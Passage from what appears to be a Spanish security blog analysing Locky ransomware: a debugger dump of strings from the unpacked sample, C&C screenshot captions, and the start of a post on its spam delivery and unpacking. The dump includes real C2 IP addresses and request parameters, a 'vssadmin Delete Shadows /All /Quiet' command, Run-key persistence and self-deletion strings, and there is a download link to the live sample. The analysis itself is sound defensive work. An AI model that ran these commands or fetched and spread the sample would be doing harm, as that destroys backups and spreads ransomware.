<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004019CA MOV DWORD PTR SS:[EBP-4],Dumped.004138B4 ASCII "bad allocation"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00401B09 PUSH Dumped.004138D0 UNICODE "0123456789ABCDEF"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00401B78 PUSH Dumped.004138C4 UNICODE ".tmp"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00401D8D PUSH Dumped.004138D0 UNICODE "0123456789ABCDEF"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00401DF0 PUSH Dumped.004138F4 UNICODE ".locky"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040253B PUSH Dumped.00413928 ASCII "invalid string position"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040255A PUSH Dumped.00413918 ASCII "string too long"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00402607 PUSH Dumped.00413918 ASCII "string too long"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00402687 PUSH Dumped.00413918 ASCII "string too long"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00402763 PUSH Dumped.00413904 ASCII "vector<t> too long"</t></span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00402832 PUSH Dumped.00413918 ASCII "string too long"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004028C4 PUSH Dumped.00413918 ASCII "string too long"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00402AE8 PUSH Dumped.00413928 ASCII "invalid string position"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00402B64 PUSH Dumped.00413928 ASCII "invalid string position"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00402D2E ASCII "L~",0</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00402D85 PUSH Dumped.00413918 ASCII "string too long"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00403174 PUSH Dumped.00413940 UNICODE "\_Locky_recover_instructions.txt"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040326D PUSH Dumped.004139BC ASCII "id="</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00403281 PUSH Dumped.004139A8 ASCII "&act=stats&path="</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004032A8 PUSH Dumped.0041399C ASCII "&encrypted="</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004032D2 PUSH Dumped.00413990 ASCII "&failed="</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004032F9 PUSH Dumped.00413984 ASCII "&length="</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00403575 MOV EDI,Dumped.004139C0 ASCII "Windows 2000"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00403599 MOV EDI,Dumped.004139D0 ASCII "Windows XP"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004035A7 MOV EDI,Dumped.004139DC ASCII "Windows 2003"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004035B1 MOV EDI,Dumped.004139EC ASCII "Windows 2003 R2"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004035D3 MOV EDI,Dumped.004139FC ASCII "Windows Vista"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004035DA MOV EDI,Dumped.00413A0C ASCII "Windows Server 2008"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004035EA MOV EDI,Dumped.00413A20 ASCII "Windows 7"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004035F1 MOV EDI,Dumped.00413A2C ASCII "Windows Server 2008 R2"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00403602 MOV EDI,Dumped.00413A44 ASCII "Windows 8"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00403609 MOV EDI,Dumped.00413A50 ASCII "Windows Server 2012"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040361A MOV EDI,Dumped.00413A64 ASCII "Windows 8.1"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00403621 MOV EDI,Dumped.00413A70 ASCII "Windows Server 2012 R2"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040363E MOV EDI,Dumped.00413A88 ASCII "Windows 10"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00403645 MOV EDI,Dumped.00413A94 ASCII "Windows Server 2016 Technical Preview"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040364C MOV EDI,Dumped.00413ABC ASCII "unknown"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004036C5 PUSH Dumped.00413CF4 ASCII "IsWow64Process"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004036CA PUSH Dumped.00413CE4 ASCII "kernel32.dll"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040376F PUSH Dumped.004139BC ASCII "id="</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040377E PUSH Dumped.00413AF4 ASCII "&act=getkey&affid="</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004037A5 PUSH Dumped.00413AEC ASCII "&lang="</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004037CB PUSH Dumped.00413AE4 ASCII "&corp="</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004037F7 PUSH Dumped.00413ADC ASCII "&serv="</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00403820 PUSH Dumped.00413AD4 ASCII "&os="</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00403847 PUSH Dumped.00413ACC ASCII "&sp="</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040386E PUSH Dumped.00413AC4 ASCII "&x64="</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00403A33 PUSH Dumped.00413B08 ASCII "Tahoma"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00403DB4 MOV DWORD PTR SS:[ESP],Dumped.00413940 UNICODE "\_Locky_recover_instructions.txt"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00403DC5 PUSH Dumped.00413B10 UNICODE "\_Locky_recover_instructions.bmp"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00403E75 PUSH Dumped.00413B54 ASCII "Control Panel\Desktop"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00403F17 MOV ECX,Dumped.00413B70 ASCII "WallpaperStyle"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00403F9B MOV ECX,Dumped.00413B80 ASCII "TileWallpaper"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00403FE6 MOV EDI,Dumped.00413B90 UNICODE "open"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004040A9 PUSH Dumped.00413CC4 ASCII "Wow64DisableWow64FsRedirection"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004040AE PUSH Dumped.00413CE4 ASCII "kernel32.dll"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004040DA MOV ESI,Dumped.004137EF ASCII "185.92.220.35,46.108.39.18,192.71.213.69,192.121.16.196,109.237.111.168,212.47.223.19,89.108.85.163"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004041E3 PUSH Dumped.00413B9C ASCII "Software\Locky"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040422D PUSH Dumped.00413BAC ASCII "id"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00404288 MOV EBX,Dumped.00413BB0 ASCII "pubkey"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004042E2 PUSH Dumped.00413BB8 ASCII "paytext"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00404355 PUSH Dumped.00413BC0 ASCII "completed"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004043ED PUSH Dumped.00413BCC UNICODE "svchost.exe"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040448A MOV ECX,Dumped.00413BAC ASCII "id"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004044E1 PUSH Dumped.00413BE4 UNICODE ":Zone.Identifier"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004045C6 PUSH Dumped.004139BC ASCII "id="</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004045DC PUSH Dumped.00413C08 ASCII "&act=gettext&lang="</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040468D PUSH Dumped.00413BB8 ASCII "paytext"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004047B5 PUSH Dumped.00413C20 UNICODE "vssadmin.exe Delete Shadows /All /Quiet"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004047E2 PUSH Dumped.00413C70 ASCII "Software\Microsoft\Windows\CurrentVersion\Run"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040486B PUSH Dumped.00413BC0 ASCII "completed"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004048AD PUSH Dumped.00413CAC ASCII "Locky"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00404993 PUSH Dumped.00413904 ASCII "vector<t> too long"</t></span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00404A78 PUSH Dumped.00413904 ASCII "vector<t> too long"</t></span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00404EE1 PUSH Dumped.00413CA0 UNICODE "Locky"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00404F81 PUSH Dumped.00413928 ASCII "invalid string position"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00404FA0 PUSH Dumped.00413918 ASCII "string too long"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00405041 PUSH Dumped.00413918 ASCII "string too long"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004050BB PUSH Dumped.00413918 ASCII "string too long"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004051B4 PUSH Dumped.00413918 ASCII "string too long"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00405409 PUSH Dumped.00413918 ASCII "string too long"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004055C2 PUSH Dumped.00413928 ASCII "invalid string position"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040563A PUSH Dumped.00413928 ASCII "invalid string position"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004057E6 PUSH Dumped.00413918 ASCII "string too long"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00405AAC MOV EDX,Dumped.00413CB4 UNICODE "/\"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00406393 MOV EDX,Dumped.00413CB4 UNICODE "/\"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004064A2 PUSH Dumped.00413D0C UNICODE "cmd.exe /C del /Q /F ""</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004064DE PUSH Dumped.00413D04 UNICODE "sys"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004069CA PUSH Dumped.00413D50 ASCII "HTTP/1.1"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004069D6 PUSH Dumped.00413D8C ASCII "POST"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004071D5 PUSH Dumped.00413D84 ASCII "http://"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004071E5 PUSH Dumped.00413D78 ASCII "/main.php"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040753F PUSH Dumped.00413904 ASCII "vector<t> too long"</t></span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040759C PUSH Dumped.00413904 ASCII "vector<t> too long"</t></span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040778B PUSH Dumped.00413918 ASCII "string too long"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004078CA PUSH Dumped.00413928 ASCII "invalid string position"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00407CBA PUSH Dumped.004147A0 UNICODE "\*"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004087B9 PUSH Dumped.00413904 ASCII "vector<t> too long"</t></span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040880F PUSH Dumped.00413904 ASCII "vector<t> too long"</t></span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00408866 PUSH Dumped.00413904 ASCII "vector<t> too long"</t></span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004088C6 PUSH Dumped.00413904 ASCII "vector<t> too long"</t></span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004089C4 PUSH Dumped.00413904 ASCII "vector<t> too long"</t></span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00408AC0 PUSH Dumped.00413904 ASCII "vector<t> too long"</t></span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00409CF7 MOV EAX,Dumped.00411344 ASCII "Unknown exception"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00409E56 MOV DWORD PTR SS:[EBP-4],Dumped.004138B4 ASCII "bad allocation"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040AB74 CALL Dumped.0040D1F9 (Initial CPU selection)</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040ADAC PUSH Dumped.00411D44 UNICODE "Runtime Error!</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">Program: "</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040ADED PUSH Dumped.00411D14 UNICODE "<program name="" unknown="">"</program></span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040AE2E PUSH Dumped.00411D0C UNICODE "..."</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040AE43 PUSH Dumped.00411D04 UNICODE "</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040AE74 PUSH Dumped.00411CB8 UNICODE "Microsoft Visual C++ Runtime Library"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040B4F9 PUSH Dumped.00411D88 UNICODE "mscoree.dll"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040B508 PUSH Dumped.00411D78 ASCII "CorExitProcess"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040C47C PUSH Dumped.004120F0 UNICODE "KERNEL32.DLL"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040C6E9 PUSH Dumped.004120F0 UNICODE "KERNEL32.DLL"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040C70A PUSH Dumped.0041212C ASCII "FlsAlloc"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040C712 PUSH Dumped.00412120 ASCII "FlsGetValue"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040C71F PUSH Dumped.00412114 ASCII "FlsSetValue"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040C72C PUSH Dumped.0041210C ASCII "FlsFree"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040D7DD PUSH Dumped.004129E8 UNICODE "USER32.DLL"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040D7F8 PUSH Dumped.004129DC ASCII "MessageBoxW"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040D811 PUSH Dumped.004129CC ASCII "GetActiveWindow"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040D821 PUSH Dumped.004129B8 ASCII "GetLastActivePopup"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040D831 PUSH Dumped.0041299C ASCII "GetUserObjectInformationW"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040D84A PUSH Dumped.00412984 ASCII "GetProcessWindowStation"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;"></span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040FD27 MOV DWORD PTR SS:[EBP+8],Dumped.004147BC ASCII "bad exception"</span><br />
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"><br /></span>
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"><br /></span>
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"><br /></span>
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;">Comunicación con el sitio de C&C</span><br />
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9BKsNorJhH8PJ3PknAa4b1S4QgUcwLS8gutZmXvHSsd57mjIzNAwXxKLC7w1o4AeBlYRjqSUfUG3-fKBk2TrYVtYbVsRAaOv6Pom8MDewd-p99hhILhppIJBlWwObVI5frSFSvWvbg0c/s1600/004.jpg" imageanchor="1"><img border="0" height="398" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9BKsNorJhH8PJ3PknAa4b1S4QgUcwLS8gutZmXvHSsd57mjIzNAwXxKLC7w1o4AeBlYRjqSUfUG3-fKBk2TrYVtYbVsRAaOv6Pom8MDewd-p99hhILhppIJBlWwObVI5frSFSvWvbg0c/s640/004.jpg" width="640" /></a></span><br />
<br />
<br />
<br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">PC Cifrada</span><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTkMxN_gdEi7ui-d1tsTys1GnpwEfG3_wLi9yGMWkOD9zI5vchpeJ6m0ZMaY3UfALZU3cSUgj_6Bqi8iFNd07OFXmSS8xRREgu1MRX0LJEb5uuOtBFB7V95uhg-C1qcT6CD1hHnl2ulns/s1600/005.jpg" imageanchor="1"><img border="0" height="493" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTkMxN_gdEi7ui-d1tsTys1GnpwEfG3_wLi9yGMWkOD9zI5vchpeJ6m0ZMaY3UfALZU3cSUgj_6Bqi8iFNd07OFXmSS8xRREgu1MRX0LJEb5uuOtBFB7V95uhg-C1qcT6CD1hHnl2ulns/s640/005.jpg" width="640" /></a><br />
<br />
<br />
<br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">Shell en sito comprometido donde se aloja el Ransomware.</span><br />
<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlD0zz_07a3LIKcorpqrC8cerDfNZ2jJ8_l9kuuLYmh2exfckJYmuoEhyjZdD-Qe2136QBvMxyP67YsyiDD74iJPh3TBK1LO5Q-HkKRCRiZFW8mp92OrllXBjBj6W8V2i-9WYg5NtOBKU/s1600/003.jpg" imageanchor="1"><img border="0" height="417" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlD0zz_07a3LIKcorpqrC8cerDfNZ2jJ8_l9kuuLYmh2exfckJYmuoEhyjZdD-Qe2136QBvMxyP67YsyiDD74iJPh3TBK1LO5Q-HkKRCRiZFW8mp92OrllXBjBj6W8V2i-9WYg5NtOBKU/s640/003.jpg" width="640" /></a><br />
<br />
<br />
<br />
Muestra: https://www.dropbox.com/s/t4x9i8xu3up8zw4/Locky-07-03-16.rar?dl=0<br />
<br />
<br />
<span style="background-color: #fefdfa; color: #333333; font-family: "arial" , "helvetica" , sans-serif; font-size: 13px; line-height: 18.2px;">Eso es todo por el momento @Dkavalanche 2016</span><br />
<br />
<br />@Dkavalanchehttp://www.blogger.com/profile/05803700040566483414noreply@blogger.com0tag:blogger.com,1999:blog-4220472203730425546.post-59125380487610499342016-03-02T11:33:00.002-08:002016-03-02T11:33:47.757-08:00<span style="background-color: #fefdfa; color: #222222; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 18.2px;"><b>Campaña de Ransomware: Locky</b></span><br />
<div style="background-color: #fefdfa; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18.2px;">
<span style="color: #222222; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 18.2px;"><br /></span></span></div>
<div style="background-color: #fefdfa; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18.2px;">
<span style="color: #222222; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 18.2px;"><br /></span></span></div>
<div style="background-color: #fefdfa;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="color: #222222;"><span style="color: #333333;"><span style="font-size: 13px; line-height: 18.2px;">Mi Amigo </span></span><a href="https://twitter.com/rfb_/status/704738520208957440" style="color: #333333; font-size: 13px; line-height: 18.2px;">Raul</a><span style="color: #333333;"><span style="font-size: 13px; line-height: 18.2px;"> me </span></span><span style="font-size: 13px; line-height: 18.2px;">envió</span><span style="color: #333333;"><span style="font-size: 13px; line-height: 18.2px;"> una muestra de este Ransomware que azota a miles de computadoras en el mundo.Como es común, llega por correos no solicitados con un</span></span></span><span style="color: #222222; font-size: 13px; line-height: 18.2px;"> adjunto .zip y un javascript codificado en su interior.</span></span></div>
<div style="background-color: #fefdfa;">
<div style="color: #333333; font-size: 13px; line-height: 18.2px;">
<span style="color: #222222;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
<div>
<span style="color: #222222; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 13px; line-height: 18.2px;">Emailing: MX62EDO 01.03.2016</span></span></div>
<div style="text-align: center;">
<span style="color: #222222; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 13px; line-height: 18.2px;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7sam8bE_Z3G8WXXgaIdv9pKTyWSonJzLBwRyXlsU19p85OFUX9_WaYQLR-Tp7k9hP_OvS-NFq6sFMa685bXmm9dmQY3gTFBejLuOV47IAkCYnCYWw9d-qAiIJDWRHkVKS9JsQuPNdwCE/s1600/TW.jpg" imageanchor="1"><img border="0" height="315" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7sam8bE_Z3G8WXXgaIdv9pKTyWSonJzLBwRyXlsU19p85OFUX9_WaYQLR-Tp7k9hP_OvS-NFq6sFMa685bXmm9dmQY3gTFBejLuOV47IAkCYnCYWw9d-qAiIJDWRHkVKS9JsQuPNdwCE/s400/TW.jpg" width="400" /></a></span></span></div>
<div>
<span style="color: #222222; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 13px; line-height: 18.2px;"><br /></span></span></div>
<div>
<span style="color: #222222; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 18.2px;">En el momento del aviso de Raúl, en VT mostraba que era detectado por solo 3 de 55 Antivirus, ahora ya es detectado por 33.</span></span></div>
<div>
<span style="color: #222222; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 13px; line-height: 18.2px;"><br /></span></span></div>
<div>
<span style="color: #222222; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 13px; line-height: 18.2px;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-COTa9ijzHUMdJD4Is4vnePBNlwyUIdjtBfvopDgt1n269AGeHQUHh47noufHdV9qdPFowxT3zRZ4MK-jtj4dTnE96sFHCH8jk04s1vmLaAZ1tvCWm2NMNhEOomJ6g3Z24tj7ZO2F1aQ/s1600/VT.jpg" imageanchor="1"><img border="0" height="135" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-COTa9ijzHUMdJD4Is4vnePBNlwyUIdjtBfvopDgt1n269AGeHQUHh47noufHdV9qdPFowxT3zRZ4MK-jtj4dTnE96sFHCH8jk04s1vmLaAZ1tvCWm2NMNhEOomJ6g3Z24tj7ZO2F1aQ/s640/VT.jpg" width="640" /></a></span></span></div>
<div>
<span style="color: #222222; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="color: #222222; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="color: #222222; font-family: Arial, Helvetica, sans-serif;">Icono de la amenaza una ves ejecutado el .js,</span></div>
<div>
<span style="color: #222222; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="color: #222222; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="text-align: center;">
<span style="color: #222222; font-family: Arial, Helvetica, sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5xiwst78rUBKtuuK02EWDh0RDzpeG26aIaCsTs0-iTR6x6WE-u9SmO41gDLOt_1cud8o7H10v4qyzaIAMxPP213jviO1OWyPZ8uHTBaa1N7yb1w5z4WT3Ed4Fae8o3oKR4Y9aeUz0BFk/s1600/00.jpg" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5xiwst78rUBKtuuK02EWDh0RDzpeG26aIaCsTs0-iTR6x6WE-u9SmO41gDLOt_1cud8o7H10v4qyzaIAMxPP213jviO1OWyPZ8uHTBaa1N7yb1w5z4WT3Ed4Fae8o3oKR4Y9aeUz0BFk/s1600/00.jpg" /></a></span></div>
<div style="text-align: center;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">La capa del crypter es fácil de quitar con un BP en ResumeThread y luego dumpeamos con PETools</span></div>
<div style="text-align: center;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="text-align: left;">
